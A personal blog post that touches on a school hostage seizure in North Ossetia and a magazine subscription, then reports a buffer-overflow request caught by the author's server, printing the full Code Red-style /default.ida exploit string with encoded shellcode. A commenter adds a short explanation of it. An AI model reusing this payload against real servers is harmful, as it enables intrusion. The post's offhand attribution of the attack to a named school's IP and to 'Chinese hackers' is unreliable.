by

Automated Black Hat.

Just to support my “occupy land == bad”-theory posted yesterday, seventeen men and women seized a school in North Ossetia in Russia this morning, taking about 150 people hostage.

The attackers’ demands are said to include the withdrawal of Russia troops from neighbouring Chechnya.

Read the whole story over at BBC News. And probably on most other online newspapers. If you live in Russia, you can follow the situation live on television.

Last week I told you about my failed attempt to subscribe to Wired. I received a letter saying that my credit card had been declined. I never got around to give subscribing a second try, which turned out to be a good thing, since a copy of the September issue of Wired was laying in my mailbox when I got home from work today. Maybe they decided to treat me with one year’s worth of free copies?

My involuntary honeypot at work is still active, and today it was actually subject to an attempted buffer overflow attack. The following request was sent to the server:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Notice the huge number of Xs filling the server buffer, and the rest of the request probably being code the attacker wanted to execute when the buffer overflowed. I have no idea what would have happened if the attacker had been able to execute the code, I only know that my server is too dumb to do anything but return a 405 error message.

The IP address (211.153.188.82) actually belongs to the 26st Primary School in Beijing. The Chinese are certainly starting to teach their hackers the trade at an early stage.

Dyana from Cali es Cali (www.caliescali.com)

Write a Comment

Comment

CAPTCHA ImageChange Image

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  1. Hi
    The “GET /default.ida?XXXXX…..”, I would believe is the CodeRed. If you are running an IDS, I think you also should see that they are trying to execute “cmd.exe”.
    Since CodeRed was designed for hitting MS IIS, you should have nothing to fear.